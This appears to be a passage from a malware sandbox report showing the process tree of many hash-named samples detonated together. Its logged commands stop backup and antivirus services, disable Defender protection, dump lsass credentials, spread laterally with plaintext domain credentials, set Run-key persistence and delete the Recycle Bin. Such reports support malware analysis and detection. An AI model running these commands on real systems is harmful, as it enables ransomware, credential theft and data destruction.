  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\48b1024f599c3184a49c0d66c5600385265b9868d0936134185326e2db0ab441.exe.exe"
  2⤵
  PID:1360
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe.exe"
  2⤵
  PID:1180
- - C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe.exe
    C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe.exe
    3⤵
    PID:3668
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5663b2d4a4aec55d5d6fb507e3fdcb92ffc978d411de68b084c37f86af6d2e19.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5663b2d4a4aec55d5d6fb507e3fdcb92ffc978d411de68b084c37f86af6d2e19.exe.exe"
  2⤵
  PID:1652
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c type "C:\Windows\\waccess1652.tmp"
    3⤵
    PID:5648
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe.exe"
  2⤵
  PID:3264
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    PID:6348
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\589af04a85dc66ec6b94123142a17cf194decd61f5d79e76183db026010e0d31.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\589af04a85dc66ec6b94123142a17cf194decd61f5d79e76183db026010e0d31.exe.exe"
  2⤵
  PID:5112
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5a310669920099cd51f82bc9eb5459e9889b6357a21f7ce95ac961e053c79acb.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5a310669920099cd51f82bc9eb5459e9889b6357a21f7ce95ac961e053c79acb.exe.exe"
  2⤵
  PID:5104
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5a765351046fea1490d20f25.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5a765351046fea1490d20f25.exe.exe"
  2⤵
  PID:4384
- - C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5a765351046fea1490d20f25.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5a765351046fea1490d20f25.exe.exe"
    3⤵
    PID:5808
- - C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5a765351046fea1490d20f25.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5a765351046fea1490d20f25.exe.exe"
    3⤵
    PID:6924
- - C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5a765351046fea1490d20f25.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5a765351046fea1490d20f25.exe.exe"
    3⤵
    PID:6648
- - C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5a765351046fea1490d20f25.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5a765351046fea1490d20f25.exe.exe"
    3⤵
    PID:5308
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c timeout 1 & del "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5a765351046fea1490d20f25.exe.exe"
      4⤵
      PID:6096
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:8540
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\52cb02da0462fdd08d537b2c949e2e252f7a7a88354d596e9f5c9f1498d1c68f.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\52cb02da0462fdd08d537b2c949e2e252f7a7a88354d596e9f5c9f1498d1c68f.exe.exe"
  2⤵
  PID:3828
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c type "C:\Windows\\waccess3828.tmp"
    3⤵
    PID:6300
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe.exe"
  2⤵
  PID:4424
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
    3⤵
    PID:4140
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -EnableControlledFolderAccess Disabled
      4⤵
      PID:5884
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop avpsus /y
    3⤵
    PID:7068
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop avpsus /y
      4⤵
      PID:7204
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop YooBackup /y
    3⤵
    PID:6552
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop YooBackup /y
      4⤵
      PID:7404
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop QBCFMonitorService /y
    3⤵
    PID:6964
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBCFMonitorService /y
      4⤵
      PID:8132
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:1568
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
      4⤵
      PID:8156
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop QBIDPService /y
    3⤵
    PID:6828
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBIDPService /y
      4⤵
      PID:8096
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop sophos /y
    3⤵
    PID:5980
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop sophos /y
      4⤵
      PID:8128
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop CAARCUpdateSvc /y
    3⤵
    PID:780
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop CAARCUpdateSvc /y
      4⤵
      PID:8668
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop CASAD2DWebSvc /y
    3⤵
    PID:4900
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop CASAD2DWebSvc /y
      4⤵
      PID:8788
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:6124
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:6052
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:1156
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:8364
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:6264
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:8072
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:6620
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:8284
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:5564
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:8764
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecDiveciMediaService /y
    3⤵
    PID:1720
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
      4⤵
      PID:8984
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:5380
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:8856
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:232
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:8548
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:1104
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:8676
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:4032
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:8476
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
    3⤵
    PID:7536
- - C:\Windows\SysWOW64\net.exe
    "net.exe" use \\10.127.0.85 /USER:EDENFIELD\efadmin P455w0rd
    3⤵
    PID:8488
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpA7EE.bat
    3⤵
    PID:8640
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:2824
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:7004
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:4428
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:1536
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    - Launches sc.exe
    PID:1564
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    - Launches sc.exe
    PID:6068
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    - Launches sc.exe
    PID:5552
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop veeam /y
    3⤵
    PID:5256
- - C:\Windows\SysWOW64\arp.exe
    "arp" -a
    3⤵
    PID:9044
- - C:\Users\Admin\AppData\Local\Temp\jdwradci.exe
    "C:\Users\Admin\AppData\Local\Temp\jdwradci.exe" \10.127.0.85 -u EDENFIELD\efadmin -p P455w0rd -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe.exe
    3⤵
    PID:8476
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:5300
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:4384
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:3060
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VSNAPVSS /y
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop stc_raw_agent /y
    3⤵
    PID:3200
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop zhudongfangyu /y
    3⤵
    PID:6104
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop YooIT /y
    3⤵
    PID:6516
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop QBFCService /y
    3⤵
    PID:5944
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop RTVscan /y
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SavRoam /y
    3⤵
    PID:1768
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ccSetMgr /y
    3⤵
    PID:5940
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ccEvtMgr /y
    3⤵
    PID:1376
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop DefWatch /y
    3⤵
    PID:5572
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:7056
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BMR Boot Service /y
    3⤵
    PID:5876
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop mfewc /y
    3⤵
    PID:5480
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop McAfeeDLPAgentService /y
    3⤵
    PID:6880
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5d491ea5705e90c817cf0f5211c9edbcd5291fe8bd4cc69cdb58e8d0e6b6d1fe.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5d491ea5705e90c817cf0f5211c9edbcd5291fe8bd4cc69cdb58e8d0e6b6d1fe.exe.exe"
  2⤵
  PID:4720
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c type "C:\Windows\\waccess4720.tmp"
    3⤵
    PID:6364
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\60C01A897DD8D60D3FEA002ED3A4B764.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\60C01A897DD8D60D3FEA002ED3A4B764.exe.exe"
  2⤵
  PID:5256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytk.bat" "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\60C01A897DD8D60D3FEA002ED3A4B764.exe.exe" "
    3⤵
    PID:5364
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:8652
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\67E4F5301851646B10A95F65A0B3BACB.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\67E4F5301851646B10A95F65A0B3BACB.exe.exe"
  2⤵
  PID:5388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytk.bat" "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\67E4F5301851646B10A95F65A0B3BACB.exe.exe" "
    3⤵
    PID:6216
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\6674ffe375f8ab54cfa2a276e4a39b414cf327e0b00733c215749e8a94385c63.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\6674ffe375f8ab54cfa2a276e4a39b414cf327e0b00733c215749e8a94385c63.exe.exe"
  2⤵
  PID:5336
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\6674FF~1.EXE"
    3⤵
    PID:6480
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\MICROS~1\wininet.exe"
    3⤵
    PID:5124
  - - C:\Users\Admin\AppData\Local\MICROS~1\wininet.exe
      C:\Users\Admin\AppData\Local\MICROS~1\wininet.exe
      4⤵
      PID:4276
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c type "C:\Windows\\waccess4276.tmp"
        5⤵
        
        PID:4068
    - - C:\Windows\SysWOW64\REG.exe
        
        REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Helper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\MICROS~1\wininet.exe -h" /f
        5⤵
        
        PID:4204
    - - C:\Windows\SysWOW64\REG.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Helper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\MICROS~1\wininet.exe" /f
        5⤵
        
        PID:2864
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\windows\wvhelp.exe"
    3⤵
    PID:5748
  - - C:\windows\wvhelp.exe
      C:\windows\wvhelp.exe
      4⤵
      PID:3204
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c type "C:\Windows\\waccess3204.tmp"
        5⤵
        
        PID:6508
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\64442cceb7d618e70c62d461cfaafdb8e653b8d98ac4765a6b3d8fd1ea3bce15.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\64442cceb7d618e70c62d461cfaafdb8e653b8d98ac4765a6b3d8fd1ea3bce15.exe.exe"
  2⤵
  PID:5320
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\6072a303039b032f1b3b0e596a3eb9a35568cef830a18404c18bb4fffef86fba.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\6072a303039b032f1b3b0e596a3eb9a35568cef830a18404c18bb4fffef86fba.exe.exe"
  2⤵
  PID:2144
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\6b91fdb0992ca029c913092db7b4fd94c917c1473953d1ec77c74d030776fe9a.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\6b91fdb0992ca029c913092db7b4fd94c917c1473953d1ec77c74d030776fe9a.exe.exe"
  2⤵
  PID:6600
- - C:\Windows\system32\cmd.exe
    C:\Windows\SysNative\cmd.exe /c C:\Windows\system32\sysprep\sysprep.exe C:\Users\Admin\AppData\Local\Temp\gupdate.exe
    3⤵
    PID:6624
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\6B97B3CD2FCFB4B74985143230441463_Gadget.exe_.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\6B97B3CD2FCFB4B74985143230441463_Gadget.exe_.exe"
  2⤵
  PID:5616
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\7249b1a5082c9d9654d9fac3bb5e965ea23e395554d3351b77dd4f29677426fe.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\7249b1a5082c9d9654d9fac3bb5e965ea23e395554d3351b77dd4f29677426fe.exe.exe"
  2⤵
  PID:5300
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:8376
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\73ebf8c9571f00c9923c87e7442f3d9132627163c5a64e40ad4eb1a1f2266de9.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\73ebf8c9571f00c9923c87e7442f3d9132627163c5a64e40ad4eb1a1f2266de9.exe.exe"
  2⤵
  PID:6720
- - C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\73ebf8c9571f00c9923c87e7442f3d9132627163c5a64e40ad4eb1a1f2266de9.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\73ebf8c9571f00c9923c87e7442f3d9132627163c5a64e40ad4eb1a1f2266de9.exe.exe"
    3⤵
    PID:5772
  - - C:\Users\Admin\AppData\Local\Temp\wovoletir.exe
      C:\Users\Admin\AppData\Local\Temp\wovoletir.exe
      4⤵
      PID:6604
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\773635768e738bec776dfd7504164b3596e5eee344757dd1ac9a1ad19b452c86.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\773635768e738bec776dfd7504164b3596e5eee344757dd1ac9a1ad19b452c86.exe.exe"
  2⤵
  PID:240
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c C:\Users\Admin\AppData\Local\Temp\procdump.exe lsass.exe C:\Users\Admin\AppData\Local\Temp\lsass.dmp
    3⤵
    PID:4136
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\7ZipSetup.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\7ZipSetup.exe.exe"
  2⤵
  PID:5168
- - C:\Users\Admin\AppData\Local\Temp\biclient.exe
    "C:\Users\Admin\AppData\Local\Temp\biclient.exe" /url bi.bisrv.com /affid "awde7zip19538" /id "7zip" /name "7-Zip" /browser ie
    3⤵
    PID:4268
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\7b8674c8f0f7c0963f2c04c35ae880e87d4c8ed836fc651e8c976197468bd98a.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\7b8674c8f0f7c0963f2c04c35ae880e87d4c8ed836fc651e8c976197468bd98a.exe.exe"
  2⤵
  PID:6888
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
    dw20.exe -x -s 996
    3⤵
    PID:5836
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\798_abroad.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\798_abroad.exe.exe"
  2⤵
  PID:6660
- - C:\Program Files (x86)\ailiao\ailiao.exe
    "C:\Program Files (x86)\ailiao\ailiao.exe" /A
    3⤵
    PID:6288
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\PROGRA~2\ailiao\ailiao.exe"
    3⤵
    PID:6892
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://ailiao.liaoban.com/xszd/index.html
    3⤵
    PID:6036
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb488546f8,0x7ffb48854708,0x7ffb48854718
      4⤵
      PID:4744
- - C:\Users\Admin\AppData\Local\Temp\nsr6C0F.tmp\ailiao.exe
    C:\Users\Admin\AppData\Local\Temp\nsr6C0F.tmp\ailiao.exe /fix
    3⤵
    PID:7128
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\86bb737bd9a508be2ff9dc0dee7e7c40abea215088c61788a368948f9250fa4c.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\86bb737bd9a508be2ff9dc0dee7e7c40abea215088c61788a368948f9250fa4c.exe.exe"
  2⤵
  PID:6516
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:7248
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\8390e210162d9b14d5b0b1ef9746c16853aa2d29d1dfc4eab6a051885e0333ed.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\8390e210162d9b14d5b0b1ef9746c16853aa2d29d1dfc4eab6a051885e0333ed.exe.exe"
  2⤵
  PID:7008
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\7824eb5f173c43574593bd3afab41a60e0e2ffae80201a9b884721b451e6d935.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\7824eb5f173c43574593bd3afab41a60e0e2ffae80201a9b884721b451e6d935.exe.exe"
  2⤵
  PID:6504
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\78201fd42dfc65e94774d8a9b87293c19044ad93edf59d3ff6846766ed4c3e2e.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\78201fd42dfc65e94774d8a9b87293c19044ad93edf59d3ff6846766ed4c3e2e.exe.exe"
  2⤵
  PID:4248
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\8a0c95be8a40ae5419f7d97bb3e91b2b.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\8a0c95be8a40ae5419f7d97bb3e91b2b.exe.exe"
  2⤵
  PID:6716
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\8953398DE47344E9C2727565AF8D6F31.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\8953398DE47344E9C2727565AF8D6F31.exe.exe"
  2⤵
  PID:6536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytk.bat" "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\8953398DE47344E9C2727565AF8D6F31.exe.exe" "
    3⤵
    PID:8824
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\75b30164a31d305f47f2c3c2121432e6d7b316cfb3deb6b39f78180168bc9472.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\75b30164a31d305f47f2c3c2121432e6d7b316cfb3deb6b39f78180168bc9472.exe.exe"
  2⤵
  PID:5688
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\8c213b3707b0b042d769fdf543c6e8bd7c127cea6a9bc989eaf241a1505d1ed9.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\8c213b3707b0b042d769fdf543c6e8bd7c127cea6a9bc989eaf241a1505d1ed9.exe.exe"
  2⤵
  PID:6240
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5ffd4c5e1766196ac1cbd799de829812757684f4432f1b8de59054890997c30d.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5ffd4c5e1766196ac1cbd799de829812757684f4432f1b8de59054890997c30d.exe.exe"
  2⤵
  PID:2276
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\94189147ba9749fd0f184fe94b345b7385348361480360a59f12adf477f61c97.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\94189147ba9749fd0f184fe94b345b7385348361480360a59f12adf477f61c97.exe.exe"
  2⤵
  PID:5696
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\9bd32162e0a50f8661fd19e3b26ff65868ab5ea636916bd54c244b0148bd9c1b.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\9bd32162e0a50f8661fd19e3b26ff65868ab5ea636916bd54c244b0148bd9c1b.exe.exe"
  2⤵
  PID:4852
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\9b3c6fd39b2809e388255c5651953251920c5c7d5e77da1070ab3c127e8bdc11.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\9b3c6fd39b2809e388255c5651953251920c5c7d5e77da1070ab3c127e8bdc11.exe.exe"
  2⤵
  PID:6096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\ldwc.bat
    3⤵
    PID:5260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\System32\cmd.exe /c timeout 1 & del C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\5a765351046fea1490d20f25.exe.exe
    3⤵
    PID:2004
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852.exe.exe"
  2⤵
  PID:4172
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\9cd5127ef31da0e8a4e36292f2af5a9ec1de3b294da367d7c05786fe2d5de44f.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\9cd5127ef31da0e8a4e36292f2af5a9ec1de3b294da367d7c05786fe2d5de44f.exe.exe"
  2⤵
  PID:2760
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\9d4b4c39106f8e2fd036e798fc67bbd7b98284121724c0f845bca0a6d2ae3999.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\9d4b4c39106f8e2fd036e798fc67bbd7b98284121724c0f845bca0a6d2ae3999.exe.exe"
  2⤵
  PID:3380
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\a0d82c3730bc41e267711480c8009883d1412b68977ab175421eabc34e4ef355.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\a0d82c3730bc41e267711480c8009883d1412b68977ab175421eabc34e4ef355.exe.exe"
  2⤵
  PID:5704
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\a6ff8dfe654da70390cd71626cdca8a6f6a0d7980cd7d82269373737b04fd206.exe.exe
